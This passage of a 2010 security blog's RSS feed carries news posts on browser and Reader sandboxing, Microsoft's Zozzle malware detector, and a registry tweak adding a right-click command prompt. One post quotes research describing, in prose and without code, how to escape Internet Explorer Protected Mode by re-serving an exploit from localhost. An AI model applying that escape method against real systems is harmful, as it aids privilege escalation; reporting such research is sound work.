&lt;object height=&quot;385&quot; width=&quot;640&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/0QRO3gKj3qw?fs=1&amp;amp;hl=en_US&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/0QRO3gKj3qw?fs=1&amp;amp;hl=en_US&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;640&quot; height=&quot;385&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you use your computer mainly to browse Internet, then Google Chrome OS is for you.&lt;br /&gt;
The browser takes care of all the programs in your computer.</description><link>http://hackinverse.blogspot.com/2010/12/google-chrome-os.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-8439261445566866138</guid><pubDate>Sat, 04 Dec 2010 14:11:00 +0000</pubDate><atom:updated>2010-12-04T19:50:07.736+05:30</atom:updated><title>Google Adds Flash Sandbox to Chrome Browser</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;Two weeks after releasing &lt;a href=&quot;http://hackinverse.blogspot.com/2010/12/adobe-releases-reader-x-with-sandbox.html&quot;&gt;Reader X with its new sandbox&lt;/a&gt;  security mechanism, Adobe has teamed up with Google to enable a  sandboxed version of its Flash software to run in Google Chrome. &lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPiwT2fQawNChRi8ECJjodVkqtbr61h8Gqbu0yBMu6gFGALzMVmQ1paBwD5BMhUvsHRmm_b7IW3skZVCbcQar2ZPxC3Mb4UAtvzmoilqiOUM9usRQ62JllsIrTPhK62Z3fvuSOB0Vz1U/s1600/c0476edae6ome-sb.jpg.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPiwT2fQawNChRi8ECJjodVkqtbr61h8Gqbu0yBMu6gFGALzMVmQ1paBwD5BMhUvsHRmm_b7IW3skZVCbcQar2ZPxC3Mb4UAtvzmoilqiOUM9usRQ62JllsIrTPhK62Z3fvuSOB0Vz1U/s320/c0476edae6ome-sb.jpg.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The  two companies said on Wednesday that Google has released a version of  Chrome to its developer channel that includes the sandboxed Flash  player. Google and Adobe have been working together on sandboxing  technology for several months now, and this is the first result of that  collaboration. The current release of Chrome with the sandboxed Flash  software runs on Windows XP, Vista and Windows 7. The sandbox used for  Flash is slightly different from the original Chrome sandbox, Google  said.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;This initial Flash Player sandbox is an important milestone  in making  Chrome even safer. In particular, users of Windows XP will see a major  security benefit, as Chrome is currently the only browser on the XP  platform that runs Flash Player in a sandbox. This first iteration of  Chrome’s Flash Player sandbox for all Windows platforms uses a modified  version of Chrome’s existing sandbox technology that protects certain  sensitive resources from being accessed by malicious code, while  allowing applications to use less sensitive ones. This implementation is  a significant first step in further reducing the potential attack  surface of the browser and protecting users against common malware,&quot;  Google&#39;s Justin Schuh and Carlos Pizano said in a blog post explaining  the Flash sandbox in Chrome.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Google and Adobe officials said that they expect to extend the  availability of Chrome with the Flash sandbox to other platforms in the  near future, although no time table was specified. Sandboxes have become  an important defense mechanism for software makers in the last year or  so as they have sought to prevent attackers from using browser-based and  PDF-based exploits to jump from vulnerable applications to other apps  or the operating system. Microsoft introduced a modified sandbox with  Internet Explorer Protected Mode in Vista and Google included a sandbox  in Chrome in 2008. &lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Adobe officials said they expect some changes to the Flash Chrome sandbox as things progress.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;Over the next few months, we will be testing and receiving feedback  on this project. Since this is a distinctly different sandboxing code  base from Internet Explorer, we are essentially starting from scratch.  Therefore, we still have a few bugs that we are working through. We hope  that we can use this experience as a platform for discussing sandbox  approaches with the other browser vendors,&quot; Adobe&#39;s Peleus Uhley said in a post about the Flash sandbox.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;The Flash Player team and the Adobe Secure Software Engineering Team  (ASSET) are excited to explore this area as an additional defense for  protecting our end-users. In addition to sandboxes, we are moving  forward in parallel with other Flash Player defenses, such as JIT  spraying mitigations.&quot;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/google-adds-flash-sandbox-to-chrome.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPiwT2fQawNChRi8ECJjodVkqtbr61h8Gqbu0yBMu6gFGALzMVmQ1paBwD5BMhUvsHRmm_b7IW3skZVCbcQar2ZPxC3Mb4UAtvzmoilqiOUM9usRQ62JllsIrTPhK62Z3fvuSOB0Vz1U/s72-c/c0476edae6ome-sb.jpg.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-6601925253573290126</guid><pubDate>Sat, 04 Dec 2010 13:52:00 +0000</pubDate><atom:updated>2010-12-04T19:57:28.974+05:30</atom:updated><title>Adobe Releases Reader X With Sandbox</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;Adobe has released the much anticipated new version of its Reader software, Adobe Reader X&lt;span class=&quot;ext&quot;&gt;&lt;/span&gt;,  which includes the new sandboxing feature meant to prevent exploits  against the software from affecting other applications on a PC.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVzWWy8B33DY5B9Qs5DTYWa9-soPAiZwzLQlpYaeIhnb0j5TxIeWjBPLEpPSyU7vO9zw0FDlmTg0sW0KRL49Sa6nzGUfBk-7bUuJ1l9ZV_CAx8nem4uUAb6zRGT_XRUk19oLcgXxP8nRE/s1600/img_3109_adobe-reader_450x360.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;239&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVzWWy8B33DY5B9Qs5DTYWa9-soPAiZwzLQlpYaeIhnb0j5TxIeWjBPLEpPSyU7vO9zw0FDlmTg0sW0KRL49Sa6nzGUfBk-7bUuJ1l9ZV_CAx8nem4uUAb6zRGT_XRUk19oLcgXxP8nRE/s320/img_3109_adobe-reader_450x360.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;The  new version of Reader, one of the more widely deployed applications  anywhere, is designed to be a major step forward in security for Adobe  customers, many of whom have been critical of the company&#39;s recent  security track record. The company has been public about its efforts to  change that track record and began talking about the upcoming inclusion  of a sandbox in Reader  several months ago.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The sandbox is a way for the Reader application to  prevent malicious code from using a vulnerability in the software to  jump from Reader to another application or the operating system itself. Adobe  officials said that the sandbox in Reader X isn&#39;t meant as a panacea,  but is one link in a chain of technologies and methods that the company  is using to help improve the quality and security of its products.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;Over the last few months, the Adobe Reader engineering team together  with the Adobe Secure Software Engineering Team, partners in the  software development community such as the Microsoft Office security  team and the Chrome team at Google, as well as customers, third-party  consultancies in the security community, and other external stakeholders  were hard at work to help ensure the sandbox implementation was as  robust as possible,&quot; Brad Arkin, Adobe&#39;s director of product security and privacy, wrote in a blog post on Reader X.&lt;br /&gt;
&lt;span class=&quot;ext&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&quot;Adobe’s product security initiatives are focused on reducing both the  frequency and the impact of security vulnerabilities. Adobe Reader  Protected Mode represents an exciting new advancement in mitigating the  impact of attempted attacks. While sandboxing is not a security silver  bullet, it provides a strong additional level of defense against  attacks. Even if exploitable security vulnerabilities are found by an  attacker, Adobe Reader Protected Mode will help prevent the attacker  from writing files or installing malware on potential victims’  computers.&quot;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Sandboxes have become a popular and useful tool  for software vendors that are looking for ways to prevent their  applications from becoming vectors for larger attacks on users&#39;  machines. The most notable example outside of Reader X is Google Chrome&lt;span class=&quot;ext&quot;&gt;&lt;/span&gt;, which has included a sandbox feature since 2008. And Microsoft&#39;s Internet Explorer has a similar feature in Protected Mode.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Adobe  Reader has been a major target for attackers in the last couple of  years, and a number of high-profile critical bugs have plagued the  application of late. Most recently, Adobe was forced to issue an emergency patch for Reader this week to fix several critical bugs.&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/adobe-releases-reader-x-with-sandbox.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVzWWy8B33DY5B9Qs5DTYWa9-soPAiZwzLQlpYaeIhnb0j5TxIeWjBPLEpPSyU7vO9zw0FDlmTg0sW0KRL49Sa6nzGUfBk-7bUuJ1l9ZV_CAx8nem4uUAb6zRGT_XRUk19oLcgXxP8nRE/s72-c/img_3109_adobe-reader_450x360.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-5300556571734306788</guid><pubDate>Sat, 04 Dec 2010 13:32:00 +0000</pubDate><atom:updated>2010-12-04T21:39:48.791+05:30</atom:updated><title>Researchers Bypass Internet Explorer Protected Mode</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbBCSKfF4TSWIuTOW3Z_ogGjGInpgboJPGUrTJTomlciY0DedVX039ixHMuxozS8xxSTbZo5fcxpKJ4TJjo0txiseWAAKcAt4zhbtjjjSJyoVeJ67bA1lSLCYhbUgR32zHO-6PmiWgcws/s1600/virus-spyware-malware-pc.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbBCSKfF4TSWIuTOW3Z_ogGjGInpgboJPGUrTJTomlciY0DedVX039ixHMuxozS8xxSTbZo5fcxpKJ4TJjo0txiseWAAKcAt4zhbtjjjSJyoVeJ67bA1lSLCYhbUgR32zHO-6PmiWgcws/s320/virus-spyware-malware-pc.jpg&quot; width=&quot;211&quot; /&gt;&lt;/a&gt;&lt;i&gt;&amp;nbsp;&quot;A new paper from researchers at Verizon Business identifies a method through which an attacker can bypass Internet Explorer Protected Mode  and gain elevated privileges once he&#39;s successfully exploited a bug on  the system. Protected Mode in Internet Explorer is one of a handful of  key security mechanisms that Microsoft has added to Windows in the last  few years.&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;i&gt;It is often described as a sandbox, in that it is designed to  prevent exploitation of a vulnerability in the browser from leading to  more persistent compromise of the underlying system. In their research,  the Verizon Business team found a method that, when combined with an  existing memory-corruption vulnerability in the browser, enables an  attacker to bypass Protected Mode and elevate his privileges on the compromised machine  (PDF). The technique enables the attacker to move from a relatively  un-privileged level to one with higher privileges, giving him complete  access to the logged-in user&#39;s account.&quot;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The key method through which IE  Protected Mode mitigates exploitation   of browser bugs is by running  many processes in low-integrity mode with   very low privileges on the  machine. The idea is that even if an   attacker is able to exploit a  vulnerability and get onto a machine, his   code will not be able to do  anything of consequence on the PC. However,   not all sites and  processes are treated equally in Protected Mode.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;Through  the hooking of the low integrity Internet Explorer process, the  Protected Mode API exposed by the Internet Explorer broker process and  other application compatibility techniques, a large number of in-process  Internet Explorer extension work in low integrity without modification.  However, other more complicated add-ins and applications require  modification. As a result of this incompatibility and Microsoft’s  dedication to backwards compatibility, not all Internet Explorer zones  render their member sites in Protected Mode. Each Internet Explorer zone  defines a set of security policies for pages rendered in that zone and  enabling Protected Mode is one of the available settings,&quot; researchers  at Verizon Business wrote in their paper, &quot;Escaping From Microsoft&#39;s Protected Mode Internet Explorer.&quot; &lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;In their research, the Verizon Business team found a method that,  when combined with an existing memory-corruption vulnerability in the  browser, enables an attacker to bypass Protected Mode and elevate his  privileges on the compromised machine. The technique enables the  attacker to move from a relatively un-privileged level to one with  higher privileges, giving him complete access to the logged-in user&#39;s  account.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;The attack assumes the existence of exploitable memory  corruption vulnerability within Internet Explorer or an extension, which  is the precise scenario that Protected Mode is supposed to mitigate.  Once the initial remote exploit has been used to execute arbitrary code  at low integrity on the client, the payload can create a web server  listening on any port on the loopback interface, even as a limited user  at low integrity. The web server should be able to serve-up the original  exploit that allowed remote exploitation in the first instance. Since  the exploit will now be launched from the same machine, exploitation can  be made significantly more reliable as Address Space Layout  Randomisation (ASLR) is no longer effective and other exploitation  techniques can be used with higher probabilities of success,&quot; the paper  says. &quot;The browser can be instructed to navigate to this new malicious  web server using the IELaunchUrl() function, which is callable from low  integrity as part of the Protected Mode API. This will cause a new tab  to be launched which will navigate to “http://localhost/exploit.html” or  similar.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The new malicious web page will be rendered in the Local  Intranet Zone and the rendering process will now be executing at medium  integrity. By exploiting the same vulnerability a second time, arbitrary  code execution can now be achieved as the same user at medium  integrity. This provides full access to the user’s account and allows  malware to be persisted on the client, something which was not possible  from low integrity whilst in Protected Mode.&quot; Other vendors have adopted the sandboxing technique recently, specifically Adobe, which &lt;a href=&quot;http://hackinverse.blogspot.com/2010/12/adobe-releases-reader-x-with-sandbox.html&quot;&gt;added a sandbox to Reader X&lt;/a&gt;. Google also put a sandbox in Chrome several years ago and this week announced that it is adding a &lt;a href=&quot;http://hackinverse.blogspot.com/2010/12/google-adds-flash-sandbox-to-chrome.html&quot;&gt;sandboxed version of Adobe Flash to future versions of Chrome.&lt;/a&gt;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/new-paper-from-researchers-at-verizon.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbBCSKfF4TSWIuTOW3Z_ogGjGInpgboJPGUrTJTomlciY0DedVX039ixHMuxozS8xxSTbZo5fcxpKJ4TJjo0txiseWAAKcAt4zhbtjjjSJyoVeJ67bA1lSLCYhbUgR32zHO-6PmiWgcws/s72-c/virus-spyware-malware-pc.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-5261116568367088479</guid><pubDate>Sat, 04 Dec 2010 13:05:00 +0000</pubDate><atom:updated>2010-12-04T19:51:34.851+05:30</atom:updated><title>Microsoft Builds Javascript Malware Detection Tool</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;i&gt;&quot;As browser-based exploits and specifically JavaScript malware have  shouldered their way to the top of the list of threats, browser vendors  have been scrambling to find effective defenses to protect users. Few  have been forthcoming, but Microsoft Research has developed a new tool  called Zozzle that can be deployed in the browser and can detect JavaScript-based malware  on the fly at a very high effectiveness rate.&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;i&gt;&amp;nbsp; &lt;/i&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS6cCjMAl72JDbBwzusSE3aKmodlTZSRR_5UcNz0ixpQqe8WZDRCfoF0GdvjhElOfok1TvO7vwj3aTyztngP2flO7V7m9QVdwQ-eZLw_wWyeKsB-I1H6dTZROV9W2YLWMj92RkP0gn5hE/s1600/889bomb.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;219&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS6cCjMAl72JDbBwzusSE3aKmodlTZSRR_5UcNz0ixpQqe8WZDRCfoF0GdvjhElOfok1TvO7vwj3aTyztngP2flO7V7m9QVdwQ-eZLw_wWyeKsB-I1H6dTZROV9W2YLWMj92RkP0gn5hE/s320/889bomb.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;i&gt;Zozzle is designed to  perform static analysis of JavaScript code on a given site and quickly  determine whether the code is malicious and includes an exploit. In  order to be effective, the tool must be trained to recognize the  elements that are common to malicious JavaScript, and the researchers  behind it stress that it works best on de-obfuscated code.&quot;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;In the paper, the researchers say that they trained Zozzle by  crawling millions of Web sites and using a similar tool, called Nozzle,  to process the URLs and see whether malware was present. &quot;ZOZZLE  makes use of a statistical classifier to efficiently identify malicious  JavaScript. The classifier needs training data to accurately classify  JavaScript source, and we describe the process we use to get that  training data here. We start by augmenting the JavaScript engine in a  browser with a “deobfuscator” that extracts and collects individual  fragments of JavaScript.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;As discussed above, exploits are frequently  buried under multiple levels of JavaScript eval. Unlike Nozzle, which  observes the behavior of running JavaScript code, ZOZZLE must be run on an unobfuscated exploit to reliably detect malicious code,&quot; the researchers wrote in a paper written on Zozzle&lt;span class=&quot;ext&quot;&gt;&lt;/span&gt;  by Benjamin Livshits and Benjamin Zorn of Microsoft Research, Christian  Seifert of Microsoft and Charles Curtsinger of the University of  Massachusetts at Amherst.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The researchers say that Zozzle is specifically designed to detect  and defend against heap-spraying exploits launched by malicious  JavaScript found on Web sites. In many cases these days, that kind of  exploit is hosted on a legitimate site that&#39;s been compromised and is  being used as part of a drive-by download attack. Often, the code is  hosted on a specific page for a day or even a few hours and then is  taken down, either by the attacker or the site owner. The Microsoft  researchers say that this, along with the multiple layers of obfuscation  that attackers use to cloak JavaScript exploits, can make it difficult  for automated tools to identify such malware with a high degree of  accuracy. The approach that they take with Zozzle is a multi-stage one.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;Once  we have labeled JavaScript contexts, we need to extract features from  them that are predictive of malicious or benign intent. For ZOZZLE, we  create features based on the hierarchical structure of the JavaScript  abstract syntax tree (AST). Specifically, a feature consists of two  parts: a context in which it appears (such as a loop, conditional,  try/catch block, etc.) and the text (or some substring) of the AST  node,&quot; the paper says. &quot;For a given JavaScript context, we only track  whether a feature appears or not, and not the number of occurrences. To  efficiently extract features from the AST, we traverse the tree from the  root, pushing AST contexts onto a stack as we descend and popping them  as we ascend.&quot;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The new tool is still in the research phase and  it&#39;s not clear when or if Microsoft Research might release Zozzle. But  the researchers say that Zozzle has an extremely low overhead when  deployed in a browser--on the order of 2-5 milliseconds per JavaScript  file--and has a false-positive rate of less than one percent.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;Much  of the novelty of ZOZZLE comes from its hooking into the JavaScript  engine of a browser to get the final, expanded version of JavaScript  code to address the issue of deobfuscation. Compared to other  classifier-based tools, ZOZZLE uses contextual information available in  the program Abstract Syntax Tree (AST) to perform fast, scalable, yet  precise malware detection,&quot; the researchers write in the paper. &quot;We see  tools like ZOZZLE deployed both in the browser to provide “first  response” for users affected by JavaScript malware and used for offline  dynamic crawling, to contribute to the creation and maintenance of  various blacklists.&quot;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/microsoft-builds-javascript-malware.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS6cCjMAl72JDbBwzusSE3aKmodlTZSRR_5UcNz0ixpQqe8WZDRCfoF0GdvjhElOfok1TvO7vwj3aTyztngP2flO7V7m9QVdwQ-eZLw_wWyeKsB-I1H6dTZROV9W2YLWMj92RkP0gn5hE/s72-c/889bomb.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-1036197303000648179</guid><pubDate>Tue, 30 Nov 2010 19:43:00 +0000</pubDate><atom:updated>2010-12-04T20:14:55.478+05:30</atom:updated><title>How to add Command Prompt to the Right Click ?</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;I love command prompt. Do you ?? I bet, a great hacker always love to be on Command Prompt so am I, although I am not a great hacker, but still, I love it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgihnJwHlsnlmZBXnHFoDC003SW34Ly-lHDpb2qB7UsYegY_aNkofsmWY3MqCOPUiG4vEacT2Rklm-DFjDqfwKw8Ed4CNG8JrAYFzzDlqcBMRgv6a1PYh7sJvANWMmi0IphaKv2iDv87Mc/s1600/command-prompt-icon.png&quot; imageanchor=&quot;1&quot; linkindex=&quot;17&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgihnJwHlsnlmZBXnHFoDC003SW34Ly-lHDpb2qB7UsYegY_aNkofsmWY3MqCOPUiG4vEacT2Rklm-DFjDqfwKw8Ed4CNG8JrAYFzzDlqcBMRgv6a1PYh7sJvANWMmi0IphaKv2iDv87Mc/s1600/command-prompt-icon.png&quot; /&gt;&lt;/a&gt;Wanna see the Command Prompt in action on every Right Click ??? Let’s get busy..&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;For this, we gotta gear up our tools to tweak the Windows Registry.  Oh Ya.. I love to modify every value of registry, coz its my machine.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Follow the steps:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
Step 1: Go to &lt;b&gt;Start&amp;nbsp; &amp;gt; Run &amp;gt; Type regedit&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Step 2: Check out the location&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here]&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Step 3: Create an entry&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;@=”Command &amp;amp;Prompt Here”&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Step 4: Now, lets go to the location&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;[HKEY_CLASSES_ROOT\Directory\shell\CommandPromptHere\command]&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Step 5: Make an entry&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;@=”cmd.exe /k cd %1 “&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Here we go. Do we need to click on Save.. Oh No.. there is no button  to click on save.. Just close the Registry and enjoy Command Prompt on  every Right Click you make.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Happy Hacking.&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/11/i-love-command-prompt.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgihnJwHlsnlmZBXnHFoDC003SW34Ly-lHDpb2qB7UsYegY_aNkofsmWY3MqCOPUiG4vEacT2Rklm-DFjDqfwKw8Ed4CNG8JrAYFzzDlqcBMRgv6a1PYh7sJvANWMmi0IphaKv2iDv87Mc/s72-c/command-prompt-icon.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-7658298400092421044</guid><pubDate>Tue, 30 Nov 2010 19:38:00 +0000</pubDate><atom:updated>2010-12-04T20:03:59.415+05:30</atom:updated><title>How to Remove All Hyperlinks in Word or Excel ?</title><description>&lt;h4 style=&quot;font-weight: normal; text-align: justify;&quot;&gt;&lt;b&gt;These two nifty macros enable you to delete the embedded hyperlinks  that are generated when typing URLS or copying information from the web&lt;/b&gt;&lt;/h4&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqhZaXehTgZFo8JHNvAdn48IeavvGA4EE-O7wOGB1ZrWVgmR8bd_ClufyU5GslhXL-5crUVdZCPfrYyaFFrtHudv0wqLX8-zQQjHJAGMR2QTXLZwiUcSo2HRhG7mQv3F8HtP5yU8XvXQw/s1600/remove-paragraph-copied-ms-word-200X200%255B1%255D.jpg&quot; imageanchor=&quot;1&quot; linkindex=&quot;16&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; 